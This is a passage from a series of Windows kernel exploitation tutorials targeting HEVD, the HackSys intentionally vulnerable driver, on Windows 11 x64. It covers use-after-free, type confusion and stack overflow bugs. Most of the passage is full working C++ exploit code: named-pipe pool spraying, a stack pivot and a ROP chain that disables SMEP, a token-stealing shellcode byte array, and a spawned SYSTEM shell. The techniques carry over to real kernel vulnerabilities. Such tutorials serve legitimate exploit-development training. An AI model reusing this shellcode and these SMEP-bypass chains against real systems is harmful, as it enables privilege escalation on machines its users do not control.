 NpFr         1          112          0            0	DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL         1          112          0            0
1: kd> !poolfind NpFr -nonpaged
...

There is again exactly one, which we just allocated. Finding the exact object in memory turned out to be a bit difficult since poolfind did not succeed to find it on my end. The general structure of this DATA_ENTRY object looks like this, followed by the actual data:

typedef struct _NP_DATA_QUEUE_ENTRY {
    LIST_ENTRY QueueEntry;
    ULONG DataEntryType;
    PIRP Irp;
    ULONG QuotaInEntry;
    PSECURITY_CLIENT_CONTEXT ClientSecurityContext;
    ULONG DataSize;
} NP_DATA_QUEUE_ENTRY, *PNP_DATA_QUEUE_ENTRY;

These DATA_ENTRY objects will be placed on the nonpaged pool and we can control their size which solves part of what we are trying to achieve. The next problem we have is that when we trigger the free in the driver and create a “hole” in memory, we can not control what is going to fill that hole – after all the kernel is very busy and could place some other object that fits there. Even if we were faster than the kernel to allocate an object of the correct size, we would still not be guaranteed to fill the spot that we freed since heap allocations on modern windows are randomized.

A way to get around that is to spray the heap with a lot of these holes, surrounded by allocations we control. This gives us a good chance to get our UAF object into one of those. After allocating and freeing the object via the vulnerable driver we allocate a huge amount of fake objects (fake objects being the ones we can create via AllocateFakeObjectNonPagedPool) to have a good chance to fill the exact hole the UAF object left.

To summarize:

  • Allocate a lot of DATA_ENTRY objects (CreatePipe + WriteFile)
  • Free every 2nd DATA_ENTRY object to create a lot of holes
  • Allocate the UAF object and Free it (this will likely happen in one of the holes we just created)
  • Allocate a lot of fake objects to fill every hole (including the one we have to hit to successfully exploit it)

This leads us to the following code:

#include <stdio.h>
#include <Windows.h>
#include <vector>

#define QWORD ULONGLONG

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017
#define FAKE_OBJECT_IOCTL 0x22201F

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    BOOL res = FALSE;
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }

    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }
    return PipeHandles{ readPipe, writePipe };
}

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        Error("CreateFile");
    }

    printf("[>] Spraying objects for pool defragmentation..\n");
    std::vector<PipeHandles> defragPipeHandles;
    for (int i = 0; i < 20000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        defragPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Spraying objects in sequential allocation..\n");
    std::vector<PipeHandles> seqPipeHandles;
    for (int i = 0; i < 60000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        seqPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Creating object holes..\n");
    for (int i = 0; i < seqPipeHandles.size(); i++) {
        if (i % 2 == 0) {
            PipeHandles handles = seqPipeHandles[i];
            CloseHandle(handles.read);
            CloseHandle(handles.write);
        }
    }

    printf("[>] Allocating UAF Object\n");
    if (!DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        //Error("Allocate UAF Object");
    }

    printf("[>] Freeing UAF Object\n");
    if (!DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Free UAF Object");
    }

    printf("[>] Filling holes with custom objects..\n");
    BYTE uBuffer[0x60] = { 0 };
    *(QWORD*)(uBuffer) = (QWORD)(0xdeadc0de);
    for (int i = 0; i < 30000; i++) {
        if (!DeviceIoControl(hDriver, FAKE_OBJECT_IOCTL, uBuffer, sizeof(uBuffer), NULL, 0, &bytesWritten, NULL)) {
            Error("Allocate Custom Object");
        }
    }

    printf("[>] Triggering callback on UAF object..\n");
    if (!DeviceIoControl(hDriver, USE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Use UAF Object");
    }
    return 0;
}

Running the updated PoC shows that this indeed works and places 0xdeadc0de in RIP:

Access violation - code c0000005 (!!! second chance !!!)
00000000`deadc0de ??              ???

At this point exploiting the vulnerability is exactly the same process as in the last post about the type-confusion vulnerability. We pivot the stack to a location we control and make sure it’s paged in. Then we use ROP to disable SMEP & jump to our shellcode. For details about how to do this please refer to the last post – we use exactly the same gadgets & shellcode. The updated PoC looks as follows:

#include <stdio.h>
#include <Windows.h>
#include <vector>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017
#define FAKE_OBJECT_IOCTL 0x22201F

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    BOOL res = FALSE;
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }

    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }
    return PipeHandles{ readPipe, writePipe };
}

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        Error("CreateFile");
    }

    printf("[>] Spraying objects for pool defragmentation..\n");
    std::vector<PipeHandles> defragPipeHandles;
    for (int i = 0; i < 20000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        defragPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Spraying objects in sequential allocation..\n");
    std::vector<PipeHandles> seqPipeHandles;
    for (int i = 0; i < 60000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        seqPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Creating object holes..\n");
    for (int i = 0; i < seqPipeHandles.size(); i++) {
        if (i % 2 == 0) {
            PipeHandles handles = seqPipeHandles[i];
            CloseHandle(handles.read);
            CloseHandle(handles.write);
        }
    }

    printf("[>] Allocating UAF Object\n");
    if (!DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        //Error("Allocate UAF Object");
    }

    printf("[>] Freeing UAF Object\n");
    if (!DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Free UAF Object");
    }

    printf("[>] Filling holes with custom objects..\n");    
    LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode, sc, 256);

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD POP_RCX = ntBase + 0x20a386;
    QWORD MOV_CR4_RCX = ntBase + 0x3acd47;
    int index = 0;

    QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
    LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!VirtualLock(kernelStack, 0x14000)) {
        Error("VirtualLock");
    }

    RtlFillMemory((LPVOID)STACK_PIVOT_ADDR, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)STACK_PIVOT_ADDR + 0x28);

    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0x350ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (QWORD)shellcode;    
    
    BYTE uBuffer[0x60] = { 0 };
    *(QWORD*)(uBuffer) = (QWORD)(STACK_PIVOT_GADGET);

    for (int i = 0; i < 30000; i++) {
        if (!DeviceIoControl(hDriver, FAKE_OBJECT_IOCTL, uBuffer, sizeof(uBuffer), NULL, 0, &bytesWritten, NULL)) {
            Error("Allocate Custom Object");
        }
    }

    printf("[>] Triggering callback on UAF object..\n");
    if (!DeviceIoControl(hDriver, USE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Use UAF Object");
    }
    system("cmd.exe");
    return 0;
}

This gives us a shell as SYSTEM.

Resources

The post Windows Kernel Exploitation – HEVD x64 Use-After-Free appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Type Confusion

By: xct
10 July 2022 at 12:14

In the last post, we looked at a Stack Overflow in HEVD on Windows 11 x64, now are going to continue with a Type Confusion Vulnerability.

Overview

Target: HEVD
OS/Arch: Windows 11 x64
Protections: ASLR, DEP, SMEP

Vulnerability Discovery

We are going over the vulnerability briefly and will focus more on the exploitation part. The source shows the following 2 objects:

typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    union {
        ULONG_PTR ObjectType;
        FunctionPointer Callback;
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

On the kernel object, we see a union of an object type and a callback, which means that there is only space for one of them, or in other words, using either of those members when accessing the struct will point to the same value. On the user object, on the other hand, we do not have this union and only have ObjectID and ObjectType.

The user object structure can be passed to the driver via an IOCTL and will then be used in the following way:

NTSTATUS TriggerTypeConfusion(_In_ PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject) {
    ...
    KernelTypeConfusionObject = (PKERNEL_TYPE_CONFUSION_OBJECT)ExAllocatePoolWithTag(
            NonPagedPool,
            sizeof(KERNEL_TYPE_CONFUSION_OBJECT),
            (ULONG)POOL_TAG
    );
    KernelTypeConfusionObject->ObjectID = UserTypeConfusionObject->ObjectID;
    KernelTypeConfusionObject->ObjectType = UserTypeConfusionObject->ObjectType;
    ...
    Status = TypeConfusionObjectInitializer(KernelTypeConfusionObject);
    ...
}

The TypeConfusionObjectInitializer function is then going ahead and calling the callback function. This function has however the same value as the ObjectType which we provided in the user object. This means that this function will call whatever function pointer we place in the ObjectType field.

NTSTATUS TypeConfusionObjectInitializer(_In_ PKERNEL_TYPE_CONFUSION_OBJECT KernelTypeConfusionObject) {
    NTSTATUS Status = STATUS_SUCCESS;
    KernelTypeConfusionObject->Callback();
    return Status;
}

The IOCTL number for this call is 0x222023, which can be found in a similar way to the last post.

Exploitation

We start by writing a simple exploit template that defines the required structure, gets a handle to the driver, and calls the IOCTL with a dummy value:

#include <stdio.h>
#include <Windows.h>

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)0x4242424242424242;

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    return 0;
}

We set a breakpoint and then run this first version of our exploit:

0: kd> ba e1 HEVD!TypeConfusionObjectInitializer
0: kd> g
1: kd> 
HEVD!TypeConfusionObjectInitializer+0x37:
fffff804`8669754b ff5308          call    qword ptr [rbx+8]
1: kd> dq rbx+8
ffffbf8c`e5b7b248  42424242`42424242 a53058d9`e6cdbefe

We can see that the driver is trying to call our provided “B”s which of course fails. So now that we can trigger the vulnerability the question remains on what address we want to call and how that helps us in elevating privileges.

Since SMEP is active, we can not just allocate shellcode and have the driver call it, so we have to make the call to a ROP-gadget that allows us to pivot the kernel stack to a location we control. This would allow us to place more ROP-gadgets there to ultimately disable SMEP & jump to Shellcode. Let’s try to find such a pivot gadget via ropper:

ropper --file ntoskrnl.exe --console --clear-cache
(ntoskrnl.exe/PE/x86_64)> search mov esp, 0x
...
0x0000000140317f70: mov esp, 0x48000000; add esp, 0x28; ret;
...

Note that we do not want just any value, it should be one that is aligned otherwise we risk getting a BSOD. The one we found looks pretty good – the add esp instruction is not bothering us too much as we can just add some dummy values before putting our next gadgets. Now that we know the address our stack will be at after executing the gadget, we can allocate it and fill it with a few ROP-nops to make sure that our stack pivot is working as intended. Since ASLR is enabled, we also have to get the address the kernel is loaded at as discussed in the last post.

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD NOP_GADGET = ntBase + 0x200042; // ret;
    int index = 0;

    LPVOID kernelStack = VirtualAlloc((LPVOID)STACK_PIVOT_ADDR, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlFillMemory(kernelStack, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)kernelStack + 0x28);
    
    *(rop + index++) = NOP_GADGET;
    *(rop + index++) = NOP_GADGET;
    *(rop + index++) = NOP_GADGET;

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)STACK_PIVOT_GADGET;

    printf("[>] Stack Pivot Gadget at %llx\n", STACK_PIVOT_GADGET);
    printf("[>] New Stack at %llx\n", STACK_PIVOT_ADDR);
    getchar();

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    return 0;
}

We run the updated exploit with a breakpoint on the stack pivot:

0: kd> ba e1 fffff80581f17f70
0: kd> g
Breakpoint 0 hit
nt!ExfReleasePushLock+0x20:
fffff805`81f17f70 bc00000048      mov     esp,48000000h
...

UNEXPECTED_KERNEL_MODE_TRAP (7f)
...
kb will then show the corrected stack.
Arguments:
Arg1: 0000000000000008, EXCEPTION_DOUBLE_FAULT
Arg2: ffff910032865e70
Arg3: 0000000048000000

On executing the pivot gadget we get a crash. This issue can be tricky to debug – essentially 2 things are happening. First, we need a bit of space before and after our gadgets so the kernel can read/write there, and additionally, we have to make sure that the stack is actually paged in because page faults will not be handled at this point (we are still in kernel mode). We update our PoC by adding 0x1000 bytes in front of our buffer and then use VirtualLock to force the memory to be paged in:

QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!VirtualLock(kernelStack, 0x14000)) {
    printf("Error using VirtualLock: %d\n", GetLastError());
}

Now we no longer get a crash and can run our ROP-nops!

0: kd> ba e1 fffff8046bd17f70
0: kd> g
nt!ExfReleasePushLock+0x20:
fffff804`6bd17f70 bc00000048      mov     esp,48000000h
1: kd> dq 48000000 -100
00000000`47ffff00  00000000`00000000 00000000`00000000
...
1: kd> dq 48000000
00000000`48000000  41414141`41414141 41414141`41414141
...
1: kd> t
nt!ExfReleasePushLock+0x25:
fffff804`6bd17f75 83c428          add     esp,28h
1: kd> p
nt!ExfReleasePushLock+0x28:
fffff804`6bd17f78 c3              ret
1: kd> p
nt!CmpUnlockKcbStackFlusherLocksExclusive+0x3a:
fffff804`6bc00042 c3              ret

At this point, the hardest part is over. We can now execute ROP-gadgets which means we can repeat the exact same steps we used in our stack overflow exploit. First, we flip the 20th bit in CR4 to disable SMEP and then jump to our shellcode (which is the same as before). The full exploit:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode, sc, 256);

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD POP_RCX = ntBase + 0x20a386;
    QWORD MOV_CR4_RCX = ntBase + 0x3acd47;
    int index = 0;

    QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
    LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!VirtualLock(kernelStack, 0x14000)) {
        printf("Error using VirtualLock: %d\n", GetLastError());
    }

    RtlFillMemory((LPVOID)STACK_PIVOT_ADDR, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)STACK_PIVOT_ADDR + 0x28);

    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0x350ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (QWORD)shellcode;

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)STACK_PIVOT_GADGET;

    printf("[>] Stack Pivot Gadget at %llx\n", STACK_PIVOT_GADGET);
    printf("[>] New Stack at %llx\n", kernelStack);
    getchar();

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    printf("[>] Enjoy your shell!\n", ntBase);
    system("cmd");
    return 0;
}

Running the exploit results in a SYSTEM shell on the target:

The post Windows Kernel Exploitation – HEVD x64 Type Confusion appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Stack Overflow

By: xct
2 July 2022 at 12:01

After setting up our debugging environment, we will look at HEVD for a few posts before diving into real-world scenarios. HEVD is an awesome, intentionally vulnerable driver by HackSysTeam that allows exploiting a lot of different kernel vulnerability types. I think this one is great to get started because you can play with exploitation without reversing any big applications or drivers.

The arguably easiest exploit on HEVD is a classic stack overflow where you overwrite the return address and have a good amount of space before & after the overwrite. We are using HEVD on default OS settings, which means ASLR, DEP & SMEP are enabled. The vulnerable function does not use stack cookies.

Overview

Target: HEVD
OS/Arch: Windows 11 x64
Protections: ASLR, DEP, SMEP

Vulnerability Discovery

I’m not going to pretend that I don’t know where the vulnerability is and will focus primarily on the exploitation part. The vulnerable function is TriggerBufferOverflowStack and uses a RtlCopyMemory from the user-provided buffer to a fixed-sized kernel buffer of a size 512 that is on the kernel stack.

In assembly this ends up as memmove:

To see what’s actually happening, we are going to create our “exploit” and just call this function while having a breakpoint on it. We are going to create a new C++ console project with the following code:

#include <stdio.h>
#include <Windows.h>


int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	LPVOID uBuffer = VirtualAlloc(NULL, 512, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, 512, 'A');
	DeviceIoControl(hDriver, 0x222003, (LPVOID)&uBuffer, sizeof(uBuffer), NULL, 0, NULL, NULL);

}

There are a few noteworthy things here. First of all, we are using CreateFile to get a handle to the driver, using its name \\.\HacksysExtremeVulnerableDriver . You can find this name by looking at the DriverEntry function in IDA:

Then we allocate our user buffer with a size of 512 which is the same size the kernel expects. Then we call the function via an IOCTL. This is essentially a way to tell the kernel to call a specific function in our driver, identified by the number, here 0x222003. Finding the number can be a bit tricky – in this case, we can go to TriggerBufferOverflowStack in IDA and then press x to find references. This shows a reference to BufferOverflowStackIoctlHandler for which we look for references again. Finally, we end up in IrpDeviceIoCtlHandler which is a big switch/case statement calling different functions depending on the IOCTL number you provide.

If we follow the arrow pointing to this basic block backward (can be a few times, but here it’s only once) we eventually end up at the correct number.

To compile our exploit we set it to Release & x64. We know how to call the function now & are going to set a breakpoint in WinDbg. In order for WinDbg to automatically load the correct symbols for HEVD you should place HEVD.pdb at C:\projects\hevd\build\driver\vulnerable\x64\HEVD\HEVD.pdb .

0: kd> ba e1 HEVD!TriggerBufferOverflowStack
0: kd> g
... <run exploit> ...
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStack:
fffff805`7d3e65b4 48895c2408      mov     qword ptr [rsp+8],rbx
u rip L40
...
fffff805`7d3e666d ff1595b9f7ff    call    qword ptr [HEVD!_imp_DbgPrintEx (fffff805`7d362008)]
